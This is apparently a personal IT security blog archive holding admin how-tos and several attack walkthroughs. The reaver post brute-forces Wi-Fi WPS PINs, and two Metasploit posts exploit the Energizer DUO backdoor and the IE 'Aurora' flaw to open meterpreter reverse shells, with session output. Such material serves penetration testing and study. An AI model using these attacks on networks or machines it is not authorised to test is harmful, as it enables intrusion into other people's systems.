Thursday, 16 February 2012

Nessus 5.0 Released

Nessus 5.0 introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:

Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.

Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as vulnerability publication date, public vulnerability database ID, Information Assurance Vulnerability Alert (IAVA), and more, makes it simple to identify easily exploitable vulnerabilities.

Industry-leading efficiency – Real-time scan results combined with on-the-fly filtering allow users to quickly see risk level and act upon vulnerability data without waiting for the scan to complete. One-click navigation makes it easy to jump from critical vulnerability to vulnerable host to the details of the vulnerability. Five severity levels quickly separate informational data from actionable results.

Fully customizable reports – Multiple filters, results management, and new pre-configured report formats allow users to produce targeted reports tailored to fit the needs/interests of executives, systems administrators, and auditors. Users can also combine multiple report templates into a single, comprehensive report, which can be delivered in a variety of formats, including PDF.

“Tenable’s dynamic library of now nearly 50,000 individual vulnerability and configuration checks is updated continuously to ensure the accuracy and relevance of Nessus scans and audits. Our next-generation scanner continues to be recognized by security professionals, network penetration testing teams, and auditors as the de facto standard for vulnerability and configuration assessment,” said Ron Gula, CEO and CTO of Tenable Network Security. “Version 5.0 builds on the solid foundation Nessus has established for quality and accuracy, and now makes it easier and faster to install and use.”

Download and info:

Sunday, 8 January 2012

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introduced to allow home users with little or no knowledge of wireless security to set up a wireless network encrypted with WPA or WPA2, as well as to make it easy to add new devices to an existing network without entering long passwords/passphrases.

In this example I will be using BackTrack 5 R1 Gnome 32 bit.

You can either boot off the DVD or install it. Creating a bootable DVD and installing BackTrack is beyond the scope of this tutorial.

I'm assuming you have two network connections: one for internet access and one via the wireless adapter that we will be using in this test. In my case I'm using both a wired and a wireless adapter.
Open up a terminal and run the following commands:

apt-get update
apt-get install reaver

Next we need to find out which interface is assigned to your wireless card, using the following command.


In my case it is wlan0.
Next we need to put the wireless card into monitor mode:

airmon-ng start wlan0

The monitor interface created is mon0.
Next we need to find the BSSID of the test router we want to crack:

airodump-ng wlan0

In my case it is 00:11:22:33:44:55.
Next we launch reaver:

reaver -i mon0 -b 00:11:22:33:44:55 -vv

Now sit back and wait, grab a cup or two of coffee, and let reaver do its thing. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my case it took just over 2 hours.

Thursday, 29 December 2011

Run Chrome as root in BackTrack 5

Download Chrome from the Google Chrome site for the version you need.

In my case

Install the Chrome version you downloaded, which should be a .deb file, using the following command (substitute the version you downloaded):

dpkg -i google-chrome-stable_current_i386.deb

However, when I launched Chrome I got the following error:

Google Chrome can not be run as root 
To fix this, edit the file /usr/bin/google-chrome using your favourite text editor. In my case I typed the following from a terminal:

gedit /usr/bin/google-chrome

Go to the very bottom of the file and add --user-data-dir to the end of the last line.

Make sure you put a space between the "$@" and the --user-data-dir.

Last step is to Save and Quit the text editor

Thursday, 6 October 2011

Installing Libre Office in Backtrack 5R1

Below are two possible options for installing LibreOffice in Backtrack 5R1

Using the PPA installation of LibreOffice

root@bt:~# add-apt-repository ppa:libreoffice/ppa
root@bt:~# apt-get update
root@bt:~# apt-get install libreoffice 

Downloading the install package from the LibreOffice website and installing manually

Download the main install package from the LibreOffice website ( ) and, if needed, your required language version, to a temporary folder. In my case /root/Downloads.

Extract the main install file. In this example the install file is the one shown below:

tar zxvf LibO_3.4.2_Linux_x86_install-deb_en-US.tar.gz

Optionally, extract your local language pack. In my case en-GB:

tar zxvf LibO_3.4.3_Linux_x86_langpack-deb_en-GB.tar.gz

Install the main package

root@bt:~# cd Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US
root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US# cd DEBS
root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# sudo dpkg -i *.deb

Install the Menu items

root@bt:~/Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# cd desktop-integration
root@bt:~/Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS/desktop-integration# sudo dpkg -i *.deb

Optionally, install the language pack:

root@bt:~# cd Downloads/LibO_3.4.3_Linux_x86_langpack-deb_en-GB
root@bt:~/Download/LibO_3.4.3_Linux_x86_langpack-deb_en-GB# cd DEBS
root@bt:~/Download/LibO_3.4.3_Linux_x86_langpack-deb_en-GB/DEBS# sudo dpkg -i *.deb

LibreOffice is now installed. Enjoy

Tuesday, 21 June 2011

Has UK gov lost the census to Lulzsec?

2011 UK census data has apparently been hacked. I'll be keeping an eye on 's Twitter feed for confirmation.

Thursday, 13 May 2010

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer. However, I had forgotten the root password. Lesson learned: save passwords in a secure location such as an encrypted USB stick or an encrypted file on my cell phone. Anyway, I digress; on to the make-it-just-work section.

From Xencenter select the virtual machine you want to boot in single user mode.

Shut down your virtual machine using the Xencenter controls.

Right click on the Boot Options for your virtual machine and select Properties.

Change the OS Boot Parameters to

rw init=/bin/bash

NOTE: If you already have something in the OS Boot Parameters you will need to take note of it, as you will need to put it back once the password reset is complete.

Save and start your virtual machine.

Your system will now boot up in single user mode.

Now it's time to change your password:

machinename# passwd root

Type in your new password you will then be asked to confirm it.

Your password has now been reset.
Shutdown your virtual machine.
machinename# shutdown -h now

Now go back to the XenCenter application and the Startup options, remove rw init=/bin/bash, and change it back to whatever was there before.
Start up your virtual machine and you should be able to logon with your new root password.

Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: HACKME\TestUser

Wednesday, 20 January 2010

Reproducing the "Aurora" IE Exploit

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the following commands:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP:
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened ( ->

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Monday, 2 November 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I am dual booting Windows XP and BackTrack with both operating systems installed on fully encrypted partitions. The following is a rough guide to setting it up. It may not be the best way of setting up this type of configuration, but it works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.

Before starting you may want to wipe your entire hard drive.
  • dd if=/dev/urandom of=/dev/hda
Windows XP encrypted with TrueCrypt 6.3
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted

Install Windows XP first (200GB)

Boot off the BackTrack4 CD. Using fdisk /dev/hda, create a /boot partition (hda2, 200MB) and a / partition (hda3, the remainder of the disk). Then set up the encrypted partition:

  • modprobe aes-i586
  • cryptsetup luksFormat /dev/hda3
  • cryptsetup luksOpen /dev/hda3 root
  • mkfs.ext3 -j -O extent /dev/mapper/root

Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root

Do not reboot just yet we need to modify a few files.

  • mkdir /mnt/root
  • mount /dev/mapper/root /mnt/root
  • mount /dev/hda2 /mnt/root/boot
  • chroot /mnt/root
  • mount -t proc proc /proc
  • mount -t sysfs sys /sys

Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
  • root /dev/hda3 none luks

Next step is to edit /etc/fstab. The / and /boot entries should look like this. Amend if needed.

  • /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
  • /dev/hda2 /boot ext3 defaults 0 0

Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.




Update your initrd with the following command:
  • update-initramfs -k all -c
I got an error when it tried to create an initrd file for kernel but BackTrack4 comes with so as long as you get no errors on the initrd for you should be good.

Now it is time to fix grub:
  • cd /boot/grub/
  • nano menu.lst

Your BackTrack section should look like this.

  • title BackTrack 4
  • uuid Your uuid of boot partition
  • kernel /vmlinuz- root=/dev/mapper/root ro quiet
  • initrd /initrd.img-
Next we need to install grub:
  • grub-install /dev/hda
Exit from the chroot environment, then unmount /mnt/root/boot and /mnt/root.

Using TrueCrypt 6.3 I fully encrypted the Windows system partition (not full disk encryption) and let it write its bootloader to the MBR. This will overwrite GRUB.

Don't worry we'll fix this later.

Boot with the BackTrack CD and copy the TrueCrypt bootloader from the MBR to a file in the /boot partition (hda2 in my case).

I used these commands to do so, with the /boot partition mounted at /mnt/boot:

  • dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
  • dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256

Reinstall grub to the MBR using these commands:
  • sudo grub
  • install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
Add a chainloader entry to the Windows XP section of menu.lst that points to the TrueCrypt bootloader saved in the /boot partition:

title XP
rootnoverify (hd0,0)
chainloader (hd0,1)/truecrypt.mbr
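As an added check (example code written here, not from the original post or from BackTrack, GRUB or TrueCrypt), this Python script parses the 512-byte MBR that the dd command above saves as truecrypt.mbr, lists its partition entries in both Linux and GRUB legacy naming, and confirms that a raw partition carries a LUKS header. All bytes and sector values are constructed for illustration, assuming the post's layout (hda1 Windows, hda2 /boot, hda3 LUKS root).

```python
# Added example: verify a saved MBR / bootloader sector and the partition
# layout described above. Sample data is constructed, not captured from a disk.
import struct

MBR_SIZE = 512
PART_TABLE_OFFSET = 446       # four 16-byte entries occupy bytes 446..509
ENTRY_FMT = "<B3xB3xII"       # status, CHS start, type, CHS end, LBA start, sector count
LUKS_MAGIC = b"LUKS\xba\xbe"  # first 6 bytes of a LUKS header on the raw partition


def grub_legacy_name(disk: int, partition: int) -> str:
    """Linux hda<N> -> GRUB legacy (hd<disk>,<N-1>), e.g. hda2 -> (hd0,1)."""
    return "(hd%d,%d)" % (disk, partition - 1)


def parse_mbr(mbr: bytes) -> list:
    """Return the non-empty partition entries of a classic MBR.

    Raises ValueError if the blob is not exactly one 512-byte sector or lacks
    the 0x55 0xAA boot signature, which is what a truncated or mis-copied
    dd image of the TrueCrypt boot sector would look like.
    """
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly %d bytes, got %d" % (MBR_SIZE, len(mbr)))
    if mbr[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        status, ptype, start, count = struct.unpack_from(
            ENTRY_FMT, mbr, PART_TABLE_OFFSET + 16 * i)
        if ptype == 0:
            continue  # unused slot
        parts.append({
            "number": i + 1,          # hda1..hda4
            "bootable": status == 0x80,
            "type": ptype,            # 0x07 NTFS/TrueCrypt, 0x83 Linux
            "start_lba": start,
            "sectors": count,
            "grub": grub_legacy_name(0, i + 1),
        })
    return parts


def is_luks_header(first_sector: bytes) -> bool:
    """True if the raw partition starts with the LUKS magic (encrypted root)."""
    return first_sector[:len(LUKS_MAGIC)] == LUKS_MAGIC


def build_mbr(entries) -> bytes:
    """Construct a minimal MBR (zeroed boot code) from (status, type, start, count) tuples."""
    mbr = bytearray(MBR_SIZE)
    for i, (status, ptype, start, count) in enumerate(entries):
        struct.pack_into(ENTRY_FMT, mbr, PART_TABLE_OFFSET + 16 * i,
                         status, ptype, start, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


# Constructed layout mirroring the post: hda1 = XP (bootable), hda2 = /boot, hda3 = LUKS /.
SAMPLE_ENTRIES = [
    (0x80, 0x07, 63, 390_000_000),
    (0x00, 0x83, 390_000_063, 409_600),
    (0x00, 0x83, 390_409_663, 300_000),
]
SAMPLE_MBR = build_mbr(SAMPLE_ENTRIES)
SAMPLE_LUKS_SECTOR = LUKS_MAGIC + b"\x00" * (MBR_SIZE - len(LUKS_MAGIC))

if __name__ == "__main__":
    for p in parse_mbr(SAMPLE_MBR):
        print(p)
    print("hda3 is LUKS:", is_luks_header(SAMPLE_LUKS_SECTOR))
```

On a real system you would feed parse_mbr the contents of truecrypt.mbr and is_luks_header the first 512 bytes of /dev/hda3 read with dd.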

Monday, 21 September 2009

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers, one of which was a DELL R900 with 4x 6-core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information, see the SQL Books Online....

Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However, it is not possible to slipstream a service pack into the SQL 2005 install CD/DVD. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

Thursday, 13 August 2009

SSD Drives and IT Forensics - Update

In a previous post, The implication of new firmware released for OCZ SSD on computer forensics, I asked a number of questions. The post was also sent to an internal mailing list where I work. A number of responses came back and I thought I'd share them.

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when it is simply connected to a power supply, or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?

No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSDs now have the ability to use TRIM under win7, linux, OSX, but only where the operating system, firmware, and associated software are correctly installed.

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).

Wednesday, 12 August 2009

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds (thanks, Google Reader, for making this so easy) I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the writer from a performance standpoint, the IT Forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive, even if the drive has been used over a long period of time. The flash memory used on the SSD drive consists of cells that usually contain 4KB pages arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little, even if it fills only a single page in the block, the entire block must be rewritten.

This is because a memory cell has to be empty to have data written to it, even if it's only partially filled. The data already contained in the cell has to be copied to the cache, the new data is then added to the cache, the old data in the cell is erased, and the new information in the cache is copied back to the memory cell. As time passes and all the cells become partially filled with old data, the SSD slows down as every new write has to go through the same process.

Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.

Now what the new firmware from OCZ apparently does is fix this while the drive is idle, by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.

From a forensics perspective, could this be considered a built-in "wiping" function on SSD drives? It is also worth noting that this could become the standard for all SSD drives.

This raises the following questions:

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

2. Does the firmware start clearing sectors when it is simply connected to a power supply, or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.


Monday, 10 August 2009

Root on HTC Magic



I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AndroidSDK\tools:

I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the USB cable, open a command prompt and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes, backups of your phone's system, boot, recovery, data, misc and cache images will be copied to the phone's SD card.

I then followed The Unlockr's Guide; unfortunately this didn't work for me and my phone just hung at the Vodafone splash screen. I left it for about 20 minutes thinking that maybe it was doing some post-load installs, but no, not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: how do I get the backup back onto my phone? I tried to re-flash it by first wiping the failed flash:

fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot

No such luck: all the fastboot flash options returned the same error:

FAILED (remote: signature verify fail)

Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools

So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools

fastboot boot recovery-RAv1.2.0G.img

The phone will boot the recovery image and you will notice an option titled

Nandroid V2.2 Restore

Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.

Monday, 3 August 2009

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If, like me, you update and deploy software to new workstations on a regular basis, you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing Office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS pre-install SATA drivers and extract them to a temporary location on the machine (c:\tmp).

Open Device Manager
Under IDE ATA/ATAPI controllers you should see something like: Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open, then select OK.

Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When the system boots, enter the BIOS, navigate to the SATA Operation option (or equivalent) and set it to AHCI.
Verify your sata ports enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.